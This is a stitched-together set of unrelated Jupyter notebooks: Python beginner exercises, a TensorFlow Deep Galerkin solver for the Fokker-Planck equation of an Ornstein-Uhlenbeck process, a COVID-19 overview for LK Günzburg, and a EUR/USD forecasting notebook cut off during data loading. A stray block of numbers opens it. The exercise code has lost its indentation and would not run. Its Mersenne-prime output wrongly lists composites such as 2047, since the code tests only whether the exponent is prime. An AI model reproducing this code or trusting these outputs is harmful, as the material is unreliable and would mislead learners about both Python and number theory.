2501 2625 2752 2882 3015 3151 3290 3432 3577 3725
3876 4030 4187 4347 4510 4676 4845 5017 5192 5370
5551 5735 5922 6112 6305 6501 6700 6902 7107 7315
7526 7740 7957 8177 8400 8626 8855 9087 9322 9560
9801 10045 10292 10542 10795 11051 11310 11572 11837 12105
12376 12650 12927 13207 13490 13776 14065 14357 14652 14950
###Markdown
Problem 2 (sum the digits of an integer)
###Code
def sumDigits(n):
    #str() converts its argument to a string
str_=str(n)
int_ = 0
for i in str_:
        int_ += int(i)#equivalent to int_ = int_ + int(i)
print(int_)
sumDigits(345)
###Output
12
###Markdown
Problem 3 (sort three numbers). Prompt the user for three integers, then call a function that displays the three numbers in ascending order.
###Code
def displaySortedNumber(num1,num2,num3):
nums = [num1,num2,num3]
    nums.sort()#sorts ascending by default; pass reverse=True to reverse
print(nums)
displaySortedNumber(3,2,1)
###Output
[1, 2, 3]
###Markdown
Problem 4 (financial application: compute future investment value). Write a program that prompts the user for an investment amount and an annual interest rate in percent, then prints a table showing the future value for years 1 through 30.
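In closed form (a standard compound-interest identity, not shown in the original), the value after $n$ years is $FV_n = P\,(1+r)^n$, where $P$ is the initial amount and $r$ is the rate expressed as a fraction; the loop below computes the same thing iteratively, multiplying by $(1+r)$ once per year.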
###Code
def futureInvestmentValue(investmentAmount,monthlyInterestRate,years):
    years = years+1
    for i in range(1,years):
        #grow by the rate each year (note: the rate here is a fraction, so 3.3 means 330%)
        income = investmentAmount+monthlyInterestRate*investmentAmount
        print(i,income)
        investmentAmount=income
futureInvestmentValue(20000,3.3,30)
###Output
1 86000.0
2 369800.0
3 1590140.0
4 6837602.0
5 29401688.599999998
6 126427260.97999997
7 543637222.2139999
8 2337640055.5201993
9 10051852238.736856
10 43222964626.56848
11 185858747894.24448
12 799192615945.2512
13 3436528248564.58
14 14777071468827.693
15 63541407315959.08
16 273228051458624.0
17 1174880621272083.0
18 5051986671469956.0
19 2.172354268732081e+16
20 9.341123355547947e+16
21 4.016683042885617e+17
22 1.7271737084408154e+18
23 7.426846946295506e+18
24 3.193544186907067e+19
25 1.3732240003700389e+20
26 5.904863201591166e+20
27 2.539091176684201e+21
28 1.0918092059742065e+22
29 4.694779585689088e+22
30 2.0187552218463076e+23
###Markdown
Problem 5 (display characters). Print the characters from ch1 to ch2, with a specified number per line. Write a test program that prints the characters from '1' to 'Z', 10 per line.
###Code
def printChar(ch1,ch2,numberPerLine):
a=ord(ch1)+1
b=ord(ch2)
n=0
for i in range(a,b):
n=n+1
if n%numberPerLine !=0:
print(chr(i),end=" ")
else:
print(chr(i))
printChar('1','Z',10)
###Output
2 3 4 5 6 7 8 9 : ;
< = > ? @ A B C D E
F G H I J K L M N O
P Q R S T U V W X Y
###Markdown
Problem 6 (days in a year). Write a test program that displays the number of days in each year from 2010 to 2020.
###Code
def numberOfDaysInAYear(year):
    for i in range(2010,2021):
        #leap-year test (the %400 case is omitted, which is fine for 2010-2020)
        if i % 4 == 0 and i%100 != 0:
            print(i , ': 366 days')
        else:
            print(i , ': 365 days')
numberOfDaysInAYear(2)
###Output
2010 : 365 days
2011 : 365 days
2012 : 366 days
2013 : 365 days
2014 : 365 days
2015 : 365 days
2016 : 366 days
2017 : 365 days
2018 : 365 days
2019 : 365 days
2020 : 366 days
###Markdown
Problem 7 (geometry). Compute the distance between two points.
###Code
import math
def distance(x1,y1,x2,y2):
d1 = x1 - x2
d2 = y1 - y2
    #compute the Euclidean distance between the two points
distance = math.sqrt(d1**2 + d2**2)
print(distance)
distance(2,5,8,7)
###Output
6.324555320336759
###Markdown
Problem 8 (Mersenne primes). If a prime can be written in the form 2^p - 1, where p is some positive integer, it is called a Mersenne prime. Write a program to find the Mersenne primes with p <= 31. For example, p = 5 gives 2^5 - 1 = 31.
###Code
def ms(p):
a=pow(2,p)-1
b=2
if p==2:
print(p,a)
for i in range(2,p):
b=b+1
if p%i==0:
break
if b == p:
print(p,a)
for p in range(1,32):
ms(p)
###Output
2 3
3 7
5 31
7 127
11 2047
13 8191
17 131071
19 524287
23 8388607
29 536870911
31 2147483647
###Markdown
Problem 9 (current time and date). Calling time.time() returns the number of seconds elapsed since midnight on January 1, 1970. Write a program that displays the current date and time.
###Code
import time
print(time.time())
t = time.localtime(time.time())  #use a new name to avoid shadowing the time module
print("Current date and time is",t.tm_year,"-",
      t.tm_mon,"-",t.tm_mday,
      t.tm_hour,":",t.tm_min,":",t.tm_sec)
###Output
1565178865.372978
Current date and time is 2019 - 8 - 7 19 : 54 : 25
###Markdown
Problem 10 (game: rolling dice)
###Code
import numpy as np
def ds():
res1 = np.random.choice([1,2,3,4,5,6])
print("您第一次抛出的点数为:",res1)
res2 = np.random.choice([1,2,3,4,5,6])
print("您第二次抛出的点数为:",res2)
res = res1 + res2
print("您抛出的两次点数之和为:",res)
return res
res = ds()
if res==2 or res==3 or res==12:
print("你输了!!!")
elif res==7 or res==11:
print("你赢了!!!")
else:
res3 = res
res = ds()
if res ==7 or res == res3:
print("你赢了!!!")
else:
print("请开始下一局!")
###Output
Your first roll: 6
Your second roll: 1
Sum of the two rolls: 7
You win!!!
|
DGM/DGM_Ornstein_Uhlenbeck_P.ipynb | ###Markdown
Deep Galerkin Network and parameter initialization
###Code
# SCRIPT FOR SOLVING THE FOKKER-PLANCK EQUATION FOR ORNSTEIN-UHLENBECK PROCESS
# WITH RANDOM (NORMALLY DISTRIBUTED) STARTING VALUE (see p.54)
#%% import needed packages
%tensorflow_version 1.x
import tensorflow as tf
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
#%% Parameters
class LSTMLayer(tf.keras.layers.Layer):
# constructor/initializer function (automatically called when new instance of class is created)
def __init__(self, output_dim, input_dim, trans1 = "tanh", trans2 = "tanh"):
'''
Args:
input_dim (int): dimensionality of input data
output_dim (int): number of outputs for LSTM layers
trans1, trans2 (str): activation functions used inside the layer;
one of: "tanh" (default), "relu" or "sigmoid"
Returns: customized Keras layer object used as intermediate layers in DGM
'''
# create an instance of a Layer object (call initialize function of superclass of LSTMLayer)
super(LSTMLayer, self).__init__()
# add properties for layer including activation functions used inside the layer
self.output_dim = output_dim
self.input_dim = input_dim
if trans1 == "tanh":
self.trans1 = tf.nn.tanh
elif trans1 == "relu":
self.trans1 = tf.nn.relu
elif trans1 == "sigmoid":
self.trans1 = tf.nn.sigmoid
if trans2 == "tanh":
self.trans2 = tf.nn.tanh
elif trans2 == "relu":
self.trans2 = tf.nn.relu
elif trans2 == "sigmoid":
            self.trans2 = tf.nn.sigmoid
### define LSTM layer parameters (use Xavier initialization)
# u vectors (weighting vectors for inputs original inputs x)
self.Uz = self.add_variable("Uz", shape=[self.input_dim, self.output_dim],
initializer = tf.contrib.layers.xavier_initializer())
self.Ug = self.add_variable("Ug", shape=[self.input_dim ,self.output_dim],
initializer = tf.contrib.layers.xavier_initializer())
self.Ur = self.add_variable("Ur", shape=[self.input_dim, self.output_dim],
initializer = tf.contrib.layers.xavier_initializer())
self.Uh = self.add_variable("Uh", shape=[self.input_dim, self.output_dim],
initializer = tf.contrib.layers.xavier_initializer())
# w vectors (weighting vectors for output of previous layer)
self.Wz = self.add_variable("Wz", shape=[self.output_dim, self.output_dim],
initializer = tf.contrib.layers.xavier_initializer())
self.Wg = self.add_variable("Wg", shape=[self.output_dim, self.output_dim],
initializer = tf.contrib.layers.xavier_initializer())
self.Wr = self.add_variable("Wr", shape=[self.output_dim, self.output_dim],
initializer = tf.contrib.layers.xavier_initializer())
self.Wh = self.add_variable("Wh", shape=[self.output_dim, self.output_dim],
initializer = tf.contrib.layers.xavier_initializer())
# bias vectors
self.bz = self.add_variable("bz", shape=[1, self.output_dim])
self.bg = self.add_variable("bg", shape=[1, self.output_dim])
self.br = self.add_variable("br", shape=[1, self.output_dim])
self.bh = self.add_variable("bh", shape=[1, self.output_dim])
# main function to be called
def call(self, S, X):
'''Compute output of a LSTMLayer for a given inputs S,X .
Args:
S: output of previous layer
X: data input
Returns: customized Keras layer object used as intermediate layers in DGM
'''
# compute components of LSTM layer output (note H uses a separate activation function)
Z = self.trans1(tf.add(tf.add(tf.matmul(X,self.Uz), tf.matmul(S,self.Wz)), self.bz))
G = self.trans1(tf.add(tf.add(tf.matmul(X,self.Ug), tf.matmul(S, self.Wg)), self.bg))
R = self.trans1(tf.add(tf.add(tf.matmul(X,self.Ur), tf.matmul(S, self.Wr)), self.br))
H = self.trans2(tf.add(tf.add(tf.matmul(X,self.Uh), tf.matmul(tf.multiply(S, R), self.Wh)), self.bh))
# compute LSTM layer output
S_new = tf.add(tf.multiply(tf.subtract(tf.ones_like(G), G), H), tf.multiply(Z,S))
return S_new
#%% Fully connected (dense) layer - modification of Keras layer class
class DenseLayer(tf.keras.layers.Layer):
# constructor/initializer function (automatically called when new instance of class is created)
def __init__(self, output_dim, input_dim, transformation=None):
'''
Args:
input_dim: dimensionality of input data
output_dim: number of outputs for dense layer
transformation: activation function used inside the layer; using
None is equivalent to the identity map
Returns: customized Keras (fully connected) layer object
'''
# create an instance of a Layer object (call initialize function of superclass of DenseLayer)
super(DenseLayer,self).__init__()
self.output_dim = output_dim
self.input_dim = input_dim
### define dense layer parameters (use Xavier initialization)
# w vectors (weighting vectors for output of previous layer)
self.W = self.add_variable("W", shape=[self.input_dim, self.output_dim], initializer = tf.contrib.layers.xavier_initializer())
# bias vectors
self.b = self.add_variable("b", shape=[1, self.output_dim])
if transformation:
if transformation == "tanh":
self.transformation = tf.tanh
elif transformation == "relu":
self.transformation = tf.nn.relu
else:
self.transformation = transformation
# main function to be called
def call(self,X):
'''Compute output of a dense layer for a given input X
Args:
X: input to layer
'''
# compute dense layer output
S = tf.add(tf.matmul(X, self.W), self.b)
if self.transformation:
S = self.transformation(S)
return S
#%% Neural network architecture used in DGM - modification of Keras Model class
class DGMNet(tf.keras.Model):
# constructor/initializer function (automatically called when new instance of class is created)
def __init__(self, layer_width, n_layers, input_dim, final_trans=None):
'''
Args:
            layer_width: number of nodes per intermediate layer
            n_layers: number of intermediate LSTM layers
            input_dim: spatial dimension of input data (EXCLUDES time dimension)
final_trans: transformation used in final layer
Returns: customized Keras model object representing DGM neural network
'''
# create an instance of a Model object (call initialize function of superclass of DGMNet)
super(DGMNet,self).__init__()
# define initial layer as fully connected
# NOTE: to account for time inputs we use input_dim+1 as the input dimensionality
self.initial_layer = DenseLayer(layer_width, input_dim+1, transformation = "tanh")
# define intermediate LSTM layers
self.n_layers = n_layers
self.LSTMLayerList = []
for _ in range(self.n_layers):
self.LSTMLayerList.append(LSTMLayer(layer_width, input_dim+1))
# define final layer as fully connected with a single output (function value)
self.final_layer = DenseLayer(1, layer_width, transformation = final_trans)
# main function to be called
def call(self,t,x):
'''
Args:
t: sampled time inputs
x: sampled space inputs
Run the DGM model and obtain fitted function value at the inputs (t,x)
'''
# define input vector as time-space pairs
X = tf.concat([t,x],1)
# call initial layer
S = self.initial_layer.call(X)
# call intermediate LSTM layers
for i in range(self.n_layers):
S = self.LSTMLayerList[i].call(S,X)
        # call final dense layer
result = self.final_layer.call(S)
return result
# OU process parameters
kappa = 0.5 # mean reversion rate
theta = 0.0 # mean reversion level
sigma = 2 # volatility
# mean and standard deviation for (normally distributed) process starting value
alpha = 0.0
beta = 0.9
# terminal time
T = 1.0
# bounds of sampling region for space dimension, i.e. sampling will be done on
# [multiplier*Xlow, multiplier*Xhigh]
Xlow = -4.0
Xhigh = 4.0
x_multiplier = 2.0
t_multiplier = 1.5
# neural network parameters
num_layers = 2
nodes_per_layer = 50
learning_rate = 0.001
# Training parameters
sampling_stages = 100 # number of times to resample new time-space domain points
steps_per_sample = 10 # number of SGD steps to take before re-sampling
# Sampling parameters
nSim_t = 5
nSim_x_interior = 50
nSim_x_initial = 50
# Save options
saveOutput = False
saveName = 'FokkerPlanck'
saveFigure = False
figureName = 'fokkerPlanck_density.png'
###Output
_____no_output_____
###Markdown
Ornstein-Uhlenbeck process: $dX_t=\kappa(\theta-X_t)dt+\sigma dW_t$, with $X_0 \sim N(0,\nu)$.

The initial condition approximates a Dirac delta $(\delta_x)$ at the start time $t$. The transition density $P(X_T|x_0)$ follows a normal distribution:

$X_T|\{X_0=x_0\} \sim N\left(x_0e^{-\kappa (T-t)}+\theta(1-e^{-\kappa(T-t)}),\ \frac{\sigma^2}{2\kappa}(1-e^{-2\kappa(T-t)})\right)$

Given a fixed starting point, the distribution is normal. NOTE: $t$ is the start time; in our case it is $0$.
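As a quick worked example with the parameters used below (assuming $\kappa=0.5$, $\theta=0$, $\sigma=2$, $t=0$, $T=1$): the mean is $x_0e^{-0.5}\approx 0.607\,x_0$ and the variance is $\frac{4}{1}(1-e^{-1})\approx 2.53$, i.e. a standard deviation of about $1.59$ -- the same $m$ and $s$ computed in `PDF_OU` below.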
###Code
#%% OU transition density function
from scipy.stats import norm
def PDF_OU(X, X0, theta, kappa, sigma, T):
    ''' Evaluate the closed-form transition density of an Ornstein-Uhlenbeck
        process started at X0, at the points X.
    Args:
        X: points at which to evaluate the density
        X0: starting value of the process
        theta: mean reversion level
        kappa: mean reversion rate
        sigma: volatility
        T: terminal time
    '''
    # mean and standard deviation of the OU endpoint distribution
    m = theta + (X0 - theta) * np.exp(-kappa * T)
    s = np.sqrt(sigma**2 / (2 * kappa) * (1 - np.exp(-2*kappa*T)))
    # evaluate the normal pdf at X
    #print(s)
    pdf = norm.pdf(X,m,s)
return pdf
#%% OU Simulation function
def simulateOU_GaussianStart(alpha, beta, theta, kappa, sigma, nSim, T):
''' Simulate end point of Ornstein-Uhlenbeck process with normally
distributed random starting value.
Args:
alpha: mean of random starting value
beta: standard deviation of random starting value
theta: mean reversion level
kappa: mean reversion rate
sigma: volatility
nSim: number of simulations
T: terminal time
'''
# simulate initial point based on normal distribution
X0 = np.random.normal(loc = alpha, scale = beta, size = nSim)
    # mean and standard deviation of OU endpoint
m = theta + (X0 - theta) * np.exp(-kappa * T)
s = np.sqrt(sigma**2 / (2 * kappa) * (1 - np.exp(-2*kappa*T)))
# simulate endpoint
X_T = np.random.normal(m,s, nSim)
return X_T
#%% Sampling function - randomly sample time-space pairs
def sampler(nSim_t, nSim_x_interior, nSim_x_initial):
''' Sample time-space points from the function's domain; points are sampled
uniformly on the interior of the domain, at the initial/terminal time points
and along the spatial boundary at different time points.
Args:
nSim_t: number of (interior) time points to sample
nSim_x_interior: number of space points in the interior of the function's domain to sample
nSim_x_initial: number of space points at initial time to sample (initial condition)
'''
# Sampler #1: domain interior
t = np.random.uniform(low=0, high=T*t_multiplier, size=[nSim_t, 1])
x_interior = np.random.uniform(low=Xlow, high=Xhigh, size=[nSim_x_interior, 1])
# Sampler #2: spatial boundary
    # sample boundary points at Xlow or Xhigh (used below to penalize the density at the edges)
x_boundary = Xlow + np.random.binomial(1, 0.5, [nSim_x_interior, 1])*(Xhigh-Xlow)
# Sampler #3: initial/terminal condition
x_initial = np.random.uniform(low=Xlow, high=Xhigh, size = [nSim_x_initial, 1])
return t, x_interior, x_boundary, x_initial
###Output
_____no_output_____
###Markdown
A transformation can be applied to get a better approximation of the pdf: $p(t,x)=\frac{e^{-u(t,x)}}{c(t)}$, where $c(t)$ is basically a normalizing constant, taken as $\int e^{-u(t,x)}dx$.
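Numerically, a sketch of how this constant could be estimated from the uniformly sampled interior points (the loss code below keeps the corresponding `tf.reduce_sum` lines commented out): $c(t) \approx \frac{X_{high}-X_{low}}{N}\sum_{i=1}^{N} e^{-u(t,x_i)}$, a Monte Carlo estimate of the integral.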
###Code
#%% Loss function for Fokker-Planck equation
import tensorflow_probability as tfp
tfd = tfp.distributions
def loss(model, t, x_interior, x_boundary, x_initial, nSim_t, alpha, beta):
''' Compute total loss for training.
NOTE: the loss is based on the PDE satisfied by the negative-exponential
of the density and NOT the density itself, i.e. the u(t,x) in
p(t,x) = exp(-u(t,x)) / c(t)
where p is the density and c is the normalization constant
Args:
model: DGM model object
t: sampled (interior) time points
x_interior: sampled space points in the interior of the function's domain
x_initial: sampled space points at initial time
nSim_t: number of (interior) time points sampled (size of t)
alpha: mean of normal distribution for process starting value
beta: standard deviation of normal distribution for process starting value
'''
# Loss term #1: PDE
# initialize vector of losses
losses_u = []
# for each simulated interior time point
for tIndex in range(nSim_t):
# make vector of current time point to align with simulated interior space points
curr_t = t[tIndex]
t_vector = curr_t * tf.ones_like(x_interior)
# compute function value and derivatives at current sampled points
p = model(t_vector, x_interior)
p_t = tf.gradients(p, t_vector)[0]
drift_x = tf.gradients(kappa*(theta-x_interior)*p, x_interior)[0]
diffusion_x = tf.gradients((sigma**2)*p, x_interior)[0]
diffusion_xx = tf.gradients(diffusion_x, x_interior)[0]
#p_t = tf.gradients(p, t_vector)[0]
#p_x = tf.gradients(p, x_interior)[0]
#p_xx = tf.gradients(p_x, x_interior)[0]
# psi function: normalized and exponentiated neural network
# note: sums are used to approximate integrals (importance sampling)
#psi_denominator = tf.reduce_sum(tf.exp(-u))
#psi = tf.reduce_sum( u_t*tf.exp(-u) ) / psi_denominator
# PDE differential operator
# NOTE: EQUATION IN DOCUMENT IS INCORRECT - EQUATION HERE IS CORRECT
#diff_f = -u_t - kappa + kappa*(x_interior- theta)*u_x - 0.5*sigma**2*(-u_xx + u_x**2) + psi
#diff_f = p_t - kappa*p - kappa*(x_interior - theta)*p_x - (sigma**2/2)*p_xx
diff_f = p_t + drift_x - 0.5 * diffusion_xx
# compute L2-norm of differential operator and attach to vector of losses
currLoss = tf.reduce_mean(tf.square(diff_f))
losses_u.append(currLoss)
# average losses across sample time points
L1 = tf.add_n(losses_u) / nSim_t
# Loss term #2: boundary condition
    # penalize the density and its spatial gradient at the boundary points
losses_u = []
for tIndex in range(nSim_t):
# make vector of current time point to align with simulated interior space points
curr_t = t[tIndex]
t_vector = curr_t * tf.ones_like(x_interior)
# compute function value and derivatives at current sampled points
p = model(t_vector, x_boundary)
p_x = tf.gradients(p, x_boundary)[0]
# psi function: normalized and exponentiated neural network
# note: sums are used to approximate integrals (importance sampling)
#psi_denominator = tf.reduce_sum(tf.exp(-u))
#psi = tf.reduce_sum( u_t*tf.exp(-u) ) / psi_denominator
# PDE differential operator
# NOTE: EQUATION IN DOCUMENT IS INCORRECT - EQUATION HERE IS CORRECT
#diff_f = -u_t - kappa + kappa*(x_interior- theta)*u_x - 0.5*sigma**2*(-u_xx + u_x**2) + psi
diff_f = tf.concat([p,p_x],0)
# compute L2-norm of differential operator and attach to vector of losses
currLoss = tf.reduce_mean(tf.square(diff_f))
losses_u.append(currLoss)
L2 = tf.add_n(losses_u) / nSim_t
# Loss term #3: initial condition
    # neural-network-implied pdf at t = 0
fitted_pdf = model(0*tf.ones_like(x_initial), x_initial)
# target pdf - normally distributed starting value
dist = tfd.Normal(loc=alpha, scale=beta)
target_pdf = dist.prob(x_initial)
# average L2 error for initial distribution
L3 = tf.reduce_mean(tf.square(fitted_pdf - target_pdf))
return L1, L2, L3
#%% Set up network
# initialize DGM model (last input: space dimension = 1)
model = DGMNet(nodes_per_layer, num_layers, 1)
# tensor placeholders (_tnsr suffix indicates tensors)
# inputs (time, space domain interior, space domain at initial time)
t_tnsr = tf.placeholder(tf.float32, [None,1])
x_interior_tnsr = tf.placeholder(tf.float32, [None,1])
x_boundary_tnsr = tf.placeholder(tf.float32, [None,1])
x_initial_tnsr = tf.placeholder(tf.float32, [None,1])
# loss
L1_tnsr, L2_tnsr, L3_tnsr = loss(model, t_tnsr, x_interior_tnsr, x_boundary_tnsr, x_initial_tnsr, nSim_t, alpha, beta)
loss_tnsr = L1_tnsr + L2_tnsr + L3_tnsr
# UNNORMALIZED density
p = model(t_tnsr, x_interior_tnsr)
# set optimizer
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss_tnsr)
# initialize variables
init_op = tf.global_variables_initializer()
# open session
sess = tf.Session()
sess.run(init_op)
#%% Train network
# for each sampling stage
for i in range(sampling_stages):
# sample uniformly from the required regions
t, x_interior, x_boundary, x_initial = sampler(nSim_t, nSim_x_interior, nSim_x_initial)
# for a given sample, take the required number of SGD steps
for j in range(steps_per_sample):
loss,L1,L2,L3,_ = sess.run([loss_tnsr, L1_tnsr, L2_tnsr, L3_tnsr, optimizer],
feed_dict = {t_tnsr:t, x_interior_tnsr:x_interior, x_boundary_tnsr:x_boundary, x_initial_tnsr:x_initial})
print(loss, L1, L2, L3, i)
# save output
if saveOutput:
saver = tf.train.Saver()
saver.save(sess, './SavedNets/' + saveName)
plt.figure()
plt.figure(figsize = (20,14))
# time values at which to examine density
densityTimes = [0.0, 0.33*T, 0.66*T, T]
# vector of x values for plotting
x_plot = np.linspace(Xlow, Xhigh, 1000)
for i, curr_t in enumerate(densityTimes):
# specify subplot
plt.subplot(2,2,i+1)
# simulate process at current t
sim_x = simulateOU_GaussianStart(alpha, beta, theta, kappa, sigma, 10000, curr_t)
pdf = PDF_OU(x_plot, alpha, theta, kappa, sigma, curr_t)
# compute normalized density at all x values to plot and current t value
t_plot = curr_t * np.ones_like(x_plot.reshape(-1,1))
density = sess.run([p], feed_dict= {t_tnsr:t_plot, x_interior_tnsr:x_plot.reshape(-1,1)})
#density = unnorm_dens[0] / sp.integrate.simps(unnorm_dens[0].reshape(x_plot.shape), x_plot)
density = np.reshape(density,(-1,))
# plot histogram of simulated process values and overlay estimated density
plt.hist(sim_x, bins=40, density=True, color = 'b', label='Histogram of the posterior')
plt.plot(x_plot, pdf, 'r', linewidth=2.5, label='true distribution')
plt.plot(x_plot, density, '--k', linewidth=2.5, label='estimated distribution')
# subplot options
plt.xlabel(r"x", fontsize=15, labelpad=10)
plt.ylabel(r"p(t,x)", fontsize=15, labelpad=20)
plt.title(r"t = %.2f"%(curr_t), fontsize=18, y=1.03)
plt.xticks(fontsize=13)
plt.yticks(fontsize=13)
plt.suptitle("Ornstein-Uhlenbeck Process")
plt.legend(fontsize=10, loc='upper right')
# adjust space between subplots
plt.subplots_adjust(wspace=0.3, hspace=0.4)
if saveFigure:
plt.savefig(figureName)
###Output
/usr/local/lib/python3.7/dist-packages/scipy/stats/_distn_infrastructure.py:1740: RuntimeWarning: divide by zero encountered in true_divide
x = np.asarray((x - loc)/scale, dtype=dtyp)
|
ipynb/Germany-Bayern-LK-Günzburg.ipynb | ###Markdown
Germany: LK Günzburg (Bayern)* Homepage of project: https://oscovida.github.io* Plots are explained at http://oscovida.github.io/plots.html* [Execute this Jupyter Notebook using myBinder](https://mybinder.org/v2/gh/oscovida/binder/master?filepath=ipynb/Germany-Bayern-LK-Günzburg.ipynb)
###Code
import datetime
import time
start = datetime.datetime.now()
print(f"Notebook executed on: {start.strftime('%d/%m/%Y %H:%M:%S%Z')} {time.tzname[time.daylight]}")
%config InlineBackend.figure_formats = ['svg']
from oscovida import *
overview(country="Germany", subregion="LK Günzburg", weeks=5);
overview(country="Germany", subregion="LK Günzburg");
compare_plot(country="Germany", subregion="LK Günzburg", dates="2020-03-15:");
# load the data
cases, deaths = germany_get_region(landkreis="LK Günzburg")
# get population of the region for future normalisation:
inhabitants = population(country="Germany", subregion="LK Günzburg")
print(f'Population of country="Germany", subregion="LK Günzburg": {inhabitants} people')
# compose into one table
table = compose_dataframe_summary(cases, deaths)
# show tables with up to 1000 rows
pd.set_option("max_rows", 1000)
# display the table
table
###Output
_____no_output_____
###Markdown
Explore the data in your web browser- If you want to execute this notebook, [click here to use myBinder](https://mybinder.org/v2/gh/oscovida/binder/master?filepath=ipynb/Germany-Bayern-LK-Günzburg.ipynb)- and wait (~1 to 2 minutes)- Then press SHIFT+RETURN to advance code cell to code cell- See http://jupyter.org for more details on how to use Jupyter Notebook Acknowledgements:- Johns Hopkins University provides data for countries- Robert Koch Institute provides data for within Germany- Atlo Team for gathering and providing data from Hungary (https://atlo.team/koronamonitor/)- Open source and scientific computing community for the data tools- Github for hosting repository and html files- Project Jupyter for the Notebook and binder service- The H2020 project Photon and Neutron Open Science Cloud ([PaNOSC](https://www.panosc.eu/))--------------------
###Code
print(f"Download of data from Johns Hopkins university: cases at {fetch_cases_last_execution()} and "
f"deaths at {fetch_deaths_last_execution()}.")
# to force a fresh download of data, run "clear_cache()"
print(f"Notebook execution took: {datetime.datetime.now()-start}")
###Output
_____no_output_____ |
tensorflow/timeseries_forecasting_exercises/forex_multivariate_forecasting.ipynb | ###Markdown
Resources and references
This GitHub page was used for this exercise: https://github.com/Rachnog/Deep-Trading/
The data are gathered from *https://HistData.com*

Data Info
In our data, the column names were not given, but the order is OPEN, HIGH, LOW, CLOSE. There was also a 'volume' column, but that is not needed for this forecasting exercise.
Data type: EUR/USD 1 min data.
The dates between 01/01/2013 and 31/12/2018 were used for the train and validation data.
The dates between 01/01/2019 and 28/02/2019 were used for the test data.

Task Info
Binary classification: classify whether the given time will have a higher or lower value. Concretely, a sample is labeled [1, 0] if the close FORECAST steps beyond the window is higher than the last close in the window, and [0, 1] otherwise.

Imports
###Code
from __future__ import print_function, absolute_import, division
# general imports for deep learning
import tensorflow as tf
from tensorflow.keras import layers
import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn import preprocessing
# data read
import pandas as pd
# plot
import matplotlib.pyplot as plt
from tensorflow.keras.utils import plot_model
# json and pretty print
import json
import pprint
# to persist the numpy arrays data
import h5py
# handle logging
tf.logging.set_verbosity(tf.logging.INFO)
###Output
_____no_output_____
###Markdown
Mount Google Drive
###Code
from google.colab import drive
drive.mount('/content/gdrive')
# check if correct place
!ls '/content/gdrive/My Drive/deep_learning/_data/forex/minutely/'
###Output
EURUSD_M1_2013.csv EURUSD_M1_2017.csv EURUSD_M1_201901.csv
EURUSD_M1_2014.csv 'EURUSD_M1_2018 (1).gsheet' EURUSD_M1_201902.csv
EURUSD_M1_2015.csv EURUSD_M1_2018.csv
EURUSD_M1_2016.csv EURUSD_M1_2018.gsheet
###Markdown
Get Data
###Code
# Concatenate a list of arrays into one flat array (axis=None flattens)
def get_concatenated_dataset(d_list):
result_data = d_list[0]
for d in d_list[1:]:
result_data = np.concatenate((result_data, d), axis=None)
return result_data
# Tries to check if the concatenated list is correct.
def concatenate_length_check(d_list, concatenated):
print("----------- length check -----------")
total_length = 0
for d in d_list:
total_length += len(d)
print("length: " +str(len(d)))
print("concatenated length "+str(len(concatenated)))
if(len(concatenated) == total_length):
print("concatenated length -----------> CORRECT")
else:
print("concatenated length -----------> WRONG")
###Output
_____no_output_____
###Markdown
Get Train And Validation Data
###Code
# initialize file names
data_folder = "/content/gdrive/My Drive/deep_learning/_data/forex/minutely/"
data_filenames = []
data_filenames.append("EURUSD_M1_2013.csv")
data_filenames.append("EURUSD_M1_2014.csv")
data_filenames.append("EURUSD_M1_2015.csv")
data_filenames.append("EURUSD_M1_2016.csv")
data_filenames.append("EURUSD_M1_2017.csv")
data_filenames.append("EURUSD_M1_2018.csv")
# get train data that will be both validation and train data in training mode
data_1 = pd.read_csv(data_folder+data_filenames[0], header=None)
data_2 = pd.read_csv(data_folder+data_filenames[1], header=None)
data_3 = pd.read_csv(data_folder+data_filenames[2], header=None)
data_4 = pd.read_csv(data_folder+data_filenames[3], header=None)
data_5 = pd.read_csv(data_folder+data_filenames[4], header=None)
data_6 = pd.read_csv(data_folder+data_filenames[5], header=None)
# Get all data as list
data_list = [data_1, data_2, data_3, data_4, data_5, data_6]
data_1.head()
# Get OPEN, HIGH, LOW, CLOSE columns in all data
open_data_list=[]
high_data_list=[]
low_data_list=[]
close_data_list=[]
for d in data_list:
open_data_list.append(d[2].as_matrix())
high_data_list.append(d[3].as_matrix())
low_data_list.append(d[4].as_matrix())
close_data_list.append(d[5].as_matrix())
# And CONCATENATE all of them
all_open_data = get_concatenated_dataset(open_data_list)
all_high_data = get_concatenated_dataset(high_data_list)
all_low_data = get_concatenated_dataset(low_data_list)
all_close_data = get_concatenated_dataset(close_data_list)
# CHECK IF CONCATENATION IS SUCCESSFUL.
concatenate_length_check(open_data_list, all_open_data)
concatenate_length_check(high_data_list, all_high_data)
concatenate_length_check(low_data_list, all_low_data)
concatenate_length_check(close_data_list, all_close_data)
###Output
----------- length check -----------
length: 370611
length: 366477
length: 372210
length: 372679
length: 371635
length: 372607
concatenated length 2226219
concatenated length -----------> CORRECT
----------- length check -----------
length: 370611
length: 366477
length: 372210
length: 372679
length: 371635
length: 372607
concatenated length 2226219
concatenated length -----------> CORRECT
----------- length check -----------
length: 370611
length: 366477
length: 372210
length: 372679
length: 371635
length: 372607
concatenated length 2226219
concatenated length -----------> CORRECT
----------- length check -----------
length: 370611
length: 366477
length: 372210
length: 372679
length: 371635
length: 372607
concatenated length 2226219
concatenated length -----------> CORRECT
###Markdown
Get Test Data
###Code
# Train Data Has been gathered.
# Now Get Test data
raw_test_data_filename = "EURUSD_M1_201901.csv"
raw_test_data_1 = pd.read_csv(data_folder+raw_test_data_filename, header=None)
#raw_test_data_1 = raw_test_data_1[5].as_matrix()#get CLOSE column
raw_test_data_filename = "EURUSD_M1_201902.csv"
raw_test_data_2 = pd.read_csv(data_folder+raw_test_data_filename, header=None)
#raw_test_data_2 = raw_test_data_2[5].as_matrix()#get only CLOSE column
d_list = [raw_test_data_1, raw_test_data_2]
open_test_data_list=[]
high_test_data_list=[]
low_test_data_list=[]
close_test_data_list=[]
for d in d_list:
open_test_data_list.append(d[2].as_matrix())
high_test_data_list.append(d[3].as_matrix())
low_test_data_list.append(d[4].as_matrix())
close_test_data_list.append(d[5].as_matrix())
# And CONCATENATE all of the test data
test_open_data = get_concatenated_dataset(open_test_data_list)
test_high_data = get_concatenated_dataset(high_test_data_list)
test_low_data = get_concatenated_dataset(low_test_data_list)
test_close_data = get_concatenated_dataset(close_test_data_list)
# CHECK IF CONCATENATION IS SUCCESSFUL.
concatenate_length_check(open_test_data_list, test_open_data)
concatenate_length_check(high_test_data_list, test_high_data)
